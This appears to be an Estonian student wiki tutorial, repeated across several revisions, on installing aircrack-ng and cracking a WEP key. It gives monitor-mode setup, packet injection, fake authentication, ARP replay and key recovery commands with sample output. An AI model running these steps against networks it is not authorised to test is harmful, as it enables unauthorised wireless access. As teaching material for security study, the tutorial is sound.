=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T20:00:43Z

Ktragel: /* Sissejuhatus */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine<ref>[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]</ref>:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks<ref>[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]</ref>:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]</ref>. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:59:58Z

Ktragel: /* Sissejuhatus */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit demonstreerides üht paljudest näitelahendustest.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine<ref>[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]</ref>:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks<ref>[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]</ref>:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]</ref>. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:57:44Z

Ktragel: /* Eeldused */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
